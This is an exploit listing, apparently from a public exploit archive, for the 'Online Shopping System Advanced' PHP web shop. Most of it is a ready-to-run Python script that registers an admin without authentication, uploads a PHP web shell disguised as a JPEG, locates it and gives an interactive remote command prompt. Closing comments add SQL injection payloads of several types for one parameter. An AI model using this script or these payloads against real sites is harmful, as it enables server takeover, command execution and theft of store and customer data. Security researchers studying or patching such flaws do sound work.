Share
## https://sploitus.com/exploit?id=PACKETSTORM:190618
# Exploit Title: Online Shopping System Advanced - Remote Code Execution
# Date: 2025-03-11
# Exploit Author: bRpsd
# Contact: cy@live.no
# Zone-H: www.zone-h.org/archive/notifier=bRpsd
# Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced/
# Version: 1.0 [latest]
# Tested on: MacOS XAMPP Darwin Kernel
# CVE : N/A
import requests
import argparse
from bs4 import BeautifulSoup
import os
parser = argparse.ArgumentParser(description='Unauthenticated Privilege Escalation + Arbitrary File Upload = RCE ')
parser.add_argument('--url', required=True, help='Base URL of the application')
args = parser.parse_args()
# Define the base URL of the application
base_url = args.url
# Step 1: Registering an Admin User
register_url = f"{base_url}/admin/reg.php"
register_data = {
"admin_name": "exploit_admin",
"admin_email": "exploit_admin@example.com",
"password_1": "password123",
"password_2": "password123",
"reg_user": "Register"
}
# Create a session to maintain cookies
session = requests.Session()
# Send the registration request
register_response = session.post(register_url, data=register_data)
print("Admin created")
# Step 2: Login as Admin
login_url = f"{base_url}/admin/login.php"
login_data = {
"admin_username": "exploit_admin@example.com",
"password": "password123",
"login_admin": "Log in"
}
# Send the login request
login_response = session.post(login_url, data=login_data)
print("Logged in as admin")
# Step 3: Upload a PHP Shell
edit_product_url = f"{base_url}/admin/admin/edit_product.php?product_id=1"
php_shell = "<?php if(isset($_GET['cmd'])) { echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>"
files = {
"picture": ("shell.php", php_shell, "image/jpeg")
}
upload_data = {
"product_name": "Exploit Product",
"details": "This is a test product",
"price": "100",
"product_type": "1",
"brand": "1",
"tags": "exploit",
"btn_save": "Save"
}
# Send the file upload request
upload_response = session.post(edit_product_url, data=upload_data, files=files)
print("Shell uploaded")
# Step 4: List files in the product_images directory
product_images_url = f"{base_url}/product_images/"
response = session.get(product_images_url)
soup = BeautifulSoup(response.text, 'html.parser')
# Find all links to files in the directory
links = soup.find_all('a')
shell_path = None
for link in links:
href = link.get('href')
if 'shell.php' in href:
shell_path = href
break
if shell_path:
shell_url = f"{product_images_url}{shell_path}"
print(f"Shell URL: {shell_url}")
# Step 5: Interact with the Shell
def execute_command(command):
response = session.get(shell_url, params={"cmd": command})
return response.text
# Example of executing commands
while True:
cmd = input("command: ")
if cmd.lower() in ['exit', 'quit']:
break
output = execute_command(cmd)
print(output)
else:
print("Shell location not found.")
# There's also an SQLi in multiple parts of the script such as
# /product.php?p=71
# /products.php?cat_id=6
# Parameter: p (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: p=73%' AND 2717=2717#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: p=-8485%' OR 1 GROUP BY CONCAT(0x717a6a6b71,(SELECT (CASE WHEN (7151=7151) THEN 1 ELSE 0 END)),0x716a6b7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
#
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: p=73%' AND (SELECT 2579 FROM (SELECT(SLEEP(5)))bYFm) AND 'Wgsl%'='Wgsl
#
#Type: UNION query
#Title: MySQL UNION query (NULL) - 10 columns
#Payload: p=73%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x574f756e6670686a636b76776b5973734d7a434e634a6e66746c704946477a7068656e7a64544e54,0x716a6b7871),NULL,NULL,NULL,NULL,NULL#